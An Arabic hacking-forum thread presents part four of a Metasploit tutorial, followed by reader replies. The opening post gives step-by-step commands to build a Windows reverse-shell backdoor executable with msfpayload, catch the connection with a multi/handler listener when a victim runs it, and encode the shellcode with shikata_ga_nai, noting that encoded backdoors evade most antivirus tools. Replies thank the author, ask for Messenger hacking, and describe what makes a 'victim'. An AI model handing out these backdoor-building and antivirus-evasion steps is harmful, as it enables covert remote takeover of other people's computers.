اشترك في قناتنا ليصلك جديدنا

اشترك في قناتنا على اليوتيوب ليصلك جديدنا

كذلك الاعجاب بصفحتنا على الفيسبوك

طرق الإستخدام المتقدم لمشروع الميتاسبلويت الجزء ( 4 )

طرق الإستخدام المتقدم لمشروع الميتاسبلويت الجزء ( 4 )


صفحة 1 من 2 12 الأخيرةالأخيرة
النتائج 1 إلى 10 من 15

الموضوع: طرق الإستخدام المتقدم لمشروع الميتاسبلويت الجزء ( 4 )

  1. #1
    :: مشرف عام :: Aljyyosh Team Array الصورة الرمزية BLACK.JaGuAr
    تاريخ التسجيل
    Jun 2009
    الدولة
    أصل العرب
    المشاركات
    2,299

    Hasri طرق الإستخدام المتقدم لمشروع الميتاسبلويت الجزء ( 4 )





    مرحباً بكم مجدداً ياأعضاء منتديات جيوش الهكر ، اليوم راح نتناول موضوع مهم واستخدام مهم لإداة الميتاسبلويت ، سنتناول بإذن الله عملية ، صناعة باك دور - وشيل كود وتشفيرة ، لنتابع...


    صناعة Shellcode / Backdoor وتشفيره


    من أهم ميزات مشروع ميتاسبلويت قدرته على صناعة شيل كود بالخيارات التي نريدها بمنتهى السرعة والسهولة, كما قلت سابقا سنحتاج للشيل كود في كتابة استغلال الثغرة فعندما يتم اكتشاف ثغرة في برنامج ما يجب أن يتم برمجة برنامج بسيط يقوم باستغلالها وهذا الأمر يرجع للمكتشف فالبعض يختار Perl , Python , C حسب الثغرة وطبيعتها لكن الأمر المؤكد أننا سنحتاج لشيل كود مبرمج بلغة Assembly بخصائص معينة, يتم حقنه داخل الذاكرة وتنفيذه من قبل المعالج مباشرة مع العلم أن برمجة هذا الكود ليس بالأمر السهل لذلك الأغلبية يلجأ لاستخدام Shellcode جاهز بخيارات محددة مسبقا أما في مشروع ميتاسبلويت فالأمر أسهل من ذلك وأفضل بكثير.. يكفي أنك قادر على صناعة Shellcode بالخيارات التي تريدها خلال بضعة ثوان!

    نستطيع صناعة الـ Shellcode الذي نريده باستخدام الأداة msfpayload الموجودة داخل مجلد المشروع ونستخدم msfencode لتشفيره, في البداية نقوم باستعراض الـ Shellcodes الموجودة داخل المشروع وخيارات msfpayload باستخدام الأمر:


    كود:
    ./msfpayload
    لنفرض أننا نريد استخدم windows/shell/reverse_tcp لانشاء اتصال عكسي, في البداية ننفذ الأمر التالي لمعرفة خيارات الشيل كود:


    كود:
    ./msfpayload windows/shell/reverse_tcp S
    لاحظ أن طريقة استخدام الأداة msfpayload نفس msfcli تماما, لصناعة شيل كود يستخدم في برمجة اسغلال مكتوب بلغة C نقوم في البداية بتحديد الخيارات التي نريدها باستخدام الأمر:

    [/SIZE]


    كود:
    ./msfpayload windows/shell/reverse_tcp LHOST=192.168.2.1 LPORT=22445 C
    نستطيع استبدال C بـ y للغة روبي وبـ P للغة Perl وهكذا… راجع خيارات msfpayload لمعرفة باقي اللغات لكن المميز بالأمر هو قدرة المشروع على صناعة ملف تنفيذي بالامتداد exe (باك دور بسيط) نعيد تنفيذ الأمر السابق مع استبدال C بـ X لكن بهذه الحالة يجب ارسال المخرجات لملف وليس طباعتها على الشاشة! لذلك ننفذ الأمر بهذا الشكل:


    كود:
    ./msfpayload windows/shell/reverse_tcp LHOST=192.168.2.1 LPORT=22445 X > reverse_tcp.exe
    الأن يجب أن نقوم بتشغيل Exploit Handler ليتولى أمر الاتصال العكسي وينجح الاستغلال, شغّل سطر أوامر المشروع وننفذ الأوامر التالية:


    كود:
    ./msfconsole
    msf > use multi/handler
    msf exploit(handler) > set LHOST 192.168.2.1
    msf exploit(handler) > exploit
    لاحظ أننا أدخلنا نفس خيارات الباك دوور reverse_tcp.exe. عند قيام المستخدم بتشغيل الملف التنفيذي سنحصل على revers remote shell كما هو واضح بالصورة التالية:




    الأداة msfencode تقوم بتشفير الشيل كود باحدى المشفّرات التي يوفرها المشروع, في البداية نقوم بصناعة الشيل كود الذي نريده (بصيغة Raw) ونرسل المخرجات لملف باسم shellcode.raw مثلا باستخدام الأمر:


    كود:
    ./msfpayload windows/shell/reverse_tcp LHOST=192.168.2.1 LPORT=22445 R > shellcode.raw
    الآن نستعرض خيارات الأداة msfencode بتنفذ الأمر:


    كود:
    ./msfencode -h



    لتشفير الشيل كود الموجود داخل الملف shellcode.raw ننفذ الأمر:


    كود:
    ./msfencode -i shellcode.raw -e x86/shikata_ga_nai -b'\x00\xff' -t c -o shellcode.c

    في الأمر السابق قمنا بتشفير الشيل كود باستخدام المشفّر x86/shikata_ga_nai مع تجنب استخدام الحروف \x00\xff لأن هذه الحروف تؤدي لتوقف الشيل كود عن العمل عند تشغيله داخل الذاكرة ثم أرسلنا الشيل كود المشفّر للمف shellcode.c لاستخدامه باستغلال مبرمج بلغة C. نستطيع استخدام encoder آخر كل ماعلينا هو تنفيذ الأمر:


    كود:
    ./msfencode -l
    لاستعراض المشفّرات الموجودة داخل المشروع, نستطيع استخدام الأداتين msfpayload و msfencode بنفس الوقت وتصدير الشيل كود لملف أو طباعته على الشاشة مثلا بشكله النهائي باستخدام الأمر:


    كود:
    ./msfpayload windows/shell/reverse_tcp LHOST=192.168.2.1 LPORT=22445 R | ./msfencode
    -e x86/shikata_ga_nai -b'\x00\xff' -t c




    حسناً حاول أن تقوم بصنع باك بدور لنظام ويندوز باستخدام msfpayload ومن ثم تشفيره باحدى المشفّرات الموجودة في msfencode وحاول فحصة باستخدام مضاد الفايروسات, الاصدارات الحديثة من المشروع تكون غير مكشوفة من معظم مضادات الفايروسات كما تستطيع صنع باكدور Meterpreter واستخدامه بنفس الطريق التي استخدمنا فيها باكدور الاتصال العكسي reverse_tcp.exe

    أعلم أني أطلت الموضوع كثيرا وفصّلته بشكل كبير فلقد أردت تغطية أكبر قدر ممكن من امكانيات مشروع ميتاسبلويت وطريقة التعامل معه.. هذا كل شيء حتى الِأن ومن الممكن أن أقوم بكتابة جزء ثالث عن مشروع ميتاسبلويت لاحقا أو أضع شرح فيديو في iSecur1ty أو أدمج المواضيع السابقة وأنسقها من جديد مع بعض الاضافات ليتم تحويلها لكتيّب صغير عن مشروع ميتاسبلويت وكما قلت سابقا ****sploit يتطور بسرعة كبيرة ومع كل اصدار جديد يتم اضافة المزيد من الأدوات والخصائص الجديدة للمشروع ولذلك أنصح بمتابعة موقع المشروع و المدونة الرسمية أيضا وحاول أن تبقي نفسك على اطلاع بـ مجريات تطوير المشروع.

    ملاحظة: استخدام مشروع ميتاسبلويت واستغلال ثغراته يجب أن يتم بدقة وليس من الضروري أن تتمكن من استغلال الثغرة واختراق الجهاز من المرة الأولى! يوجد أكثر من 100 احتمال لعدم عمل الاستغلال بالشكل المطلوب وهنا يأتي دورك لاكتشاف السبب وليس دوري! أنا أشرح طريقة الاستخدام وكيفية التعامل مع المشروع لكني لن أتمكن من معرفة لماذا لم يعمل الاستغلال عندك أو لماذا لم تتمكن من اختراق الجهاز!! قد تكون المشكلة نقص بالحزم الموجودة في جهازك أو من الثغرة, الاعدادات التي اخترتها, الاستغلال أو احدى خياراته, اصدار الثغرة, اصدار النظام الذي تحاول اختراقه مختلف, من الممكن أن يكون مدير النظام قد حدّث النظام أو أصلح الثغرة أو حتى وجود جدار ناري أو أنظمة حماية IDS تمنع تنفيذ الاستغلال… باختصار “Think Out The Box” واعتمد على نفسك في حل المشاكل كما أني أنصح بشدة القيام بتطبيق ما قرأته داخل Lab خاص بك والتدرب على استخدام مشروع ميتاسبلويت واستغلال ثغراته بشكل عملي.


    إلى هنا نكون أنهينا الجزء الرابع والأخير ، وإن شاء الله سنتناول في مواضيع أخرى تطبيقات عملية لمشروع الميتاسبلويت فترقبونا ...


    ودمتم سالمين



  2. #2
    هكر متميز Array الصورة الرمزية Abdullhadi JC
    تاريخ التسجيل
    Jul 2009
    الدولة
    Underworld
    المشاركات
    1,069

    افتراضي رد: طرق الإستخدام المتقدم لمشروع الميتاسبلويت الجزء ( 4 )

    شكرا على الشرح الرائع ويسعدني ان اكون
    اول من يرد على الموضوع
    وانا اسف جدا على
    غيابي عن النتدى
    لاسباب شخصية


  3. #3
    هكر نشيط Array
    تاريخ التسجيل
    Feb 2010
    المشاركات
    110

    افتراضي رد: طرق الإستخدام المتقدم لمشروع الميتاسبلويت الجزء ( 4 )

    يعطيك الف الف عافية بس يا ريت يعني تورونا اختراقات المسن + البرنامج لانو اكثر البرامج ملغمة



  4. #4
    هكر مجتهد Array الصورة الرمزية darts
    تاريخ التسجيل
    Jan 2010
    الدولة
    ببلاد الله الواسعة
    المشاركات
    330

    افتراضي رد: طرق الإستخدام المتقدم لمشروع الميتاسبلويت الجزء ( 4 )

    مشكور معلمنا جاري التعلم تحياتي


  5. #5
    هكر مبتديء Array الصورة الرمزية abdellah-choko
    تاريخ التسجيل
    Jun 2010
    الدولة
    alger
    المشاركات
    31

    افتراضي رد: طرق الإستخدام المتقدم لمشروع الميتاسبلويت الجزء ( 4 )

    ما فهمت وااااالووووووووووو =(


  6. #6
    هكر متميز Array الصورة الرمزية System 32
    تاريخ التسجيل
    Sep 2009
    الدولة
    System 32
    المشاركات
    634

    افتراضي رد: طرق الإستخدام المتقدم لمشروع الميتاسبلويت الجزء ( 4 )

    la;,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,v



  7. #7
    هكر نشيط Array
    تاريخ التسجيل
    Sep 2010
    الدولة
    ســــوريـا الغـالـيـة
    المشاركات
    115

    افتراضي رد: طرق الإستخدام المتقدم لمشروع الميتاسبلويت الجزء ( 4 )

    شكرااا أخي عل الشرح الأكثر من رائع

    وأنا حسب معرفتي المتواضعة أنا الميتا له شروط وهي

    نظام لينوكس(لأن المشروع يعمل أفضل عل لينوكس)+أي بي ثابت + جدار تاري مغلق أو لايحظر البورت المستهدف+بورت مفتوح=ضـــحــيــــة

    تقبل مروري..


  8. #8
    هكر نشيط Array الصورة الرمزية abdo el7dad
    تاريخ التسجيل
    Dec 2010
    المشاركات
    152

    افتراضي رد: طرق الإستخدام المتقدم لمشروع الميتاسبلويت الجزء ( 4 )

    السلام عليكم
    الف شكر علي الشرح
    وجزاك الله خيرا


  9. #9
    هكر مبتديء Array الصورة الرمزية Rey NeGro
    تاريخ التسجيل
    Sep 2011
    المشاركات
    22

    افتراضي رد: طرق الإستخدام المتقدم لمشروع الميتاسبلويت الجزء ( 4 )

    شــــــــــكرا شكرا ع الشررح الررااائع

    في انتظآآآآر الجديد ,,,,,



  10. #10
    هكر مجتهد Array الصورة الرمزية S.N_StrawHat
    تاريخ التسجيل
    Mar 2011
    الدولة
    Grand Line
    المشاركات
    528

    افتراضي رد: طرق الإستخدام المتقدم لمشروع الميتاسبلويت الجزء ( 4 )

    رؤؤؤؤعة قليل في حقك يابطل .... من أفضل الشروحات الي شفتها في حياتي على الرغم انها قديمة بعض الشيئ


    تحياتي لك


صفحة 1 من 2 12 الأخيرةالأخيرة

المواضيع المتشابهه

  1. الاختراق المتقدم (m-e-t-a-s-p-l-o-i-t)
    بواسطة ASDELY-ScOrPiOn في المنتدى قسم الإختراق بالميتاسبلوت والإتصال العكسي
    مشاركات: 39
    آخر مشاركة: 03-05-2013, 08:53 PM
  2. طرق الإستخدام المتقدم لمشروع الميتاسبلويت الجزء ( 1 )
    بواسطة BLACK.JaGuAr في المنتدى قسم الإختراق بالميتاسبلوت والإتصال العكسي
    مشاركات: 115
    آخر مشاركة: 12-21-2012, 11:58 PM
  3. التطورات والمميزات الجديدة في الميتاسبلويت 3.3-dev
    بواسطة BLACK.JaGuAr في المنتدى قسم الإختراق بالميتاسبلوت والإتصال العكسي
    مشاركات: 10
    آخر مشاركة: 10-02-2012, 11:38 PM
  4. طرق الإستخدام المتقدم لمشروع الميتاسبلويت الجزء ( 2 )
    بواسطة BLACK.JaGuAr في المنتدى قسم الإختراق بالميتاسبلوت والإتصال العكسي
    مشاركات: 28
    آخر مشاركة: 10-02-2012, 11:03 PM
  5. طرق الإستخدام المتقدم لمشروع الميتاسبلويت الجزء ( 3 )
    بواسطة BLACK.JaGuAr في المنتدى قسم الإختراق بالميتاسبلوت والإتصال العكسي
    مشاركات: 16
    آخر مشاركة: 11-24-2011, 03:49 PM

وجد الزوار هذه الصفحة بالبحث عن:

قسم الميتاسبلويت

ل الإختراق المتقدم والميتاسبلويت

كيفية استخدام الميتاسبلويت في عمل اختراق المواقع

شرح ميتاسبلويت 4

مشروع الميتاسبلويت

ميتاسبلويت 4

استخدام الميتاسبولت

كيفية استخدام الميتاسبلويتإختراق المواقع بإستعمال الميتاسبلويتاستخدام الميتاسبلويتمشروع الميتاسبلويت لاختراق المواقعمشروع الميتا سبلويتاستخدام الميتا سبولتmsfencode شرحكيفية استخدام ميتاسبلواتمشروع الميتاسبلويت 2013msfpayloadصنع البـآك دور بالميتاسبلويت كيفية التعامل مع msfencodeصنع باكدور ميتاسبلويتاستعمال الميتاسبلويت 4site:aljyyosh.com metasploit 32 aljyyoshاستخدام التصال العكسى فى الميتا سبلويتاكواد ميتاسبلويتمنتدى الميتاسبلويت

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •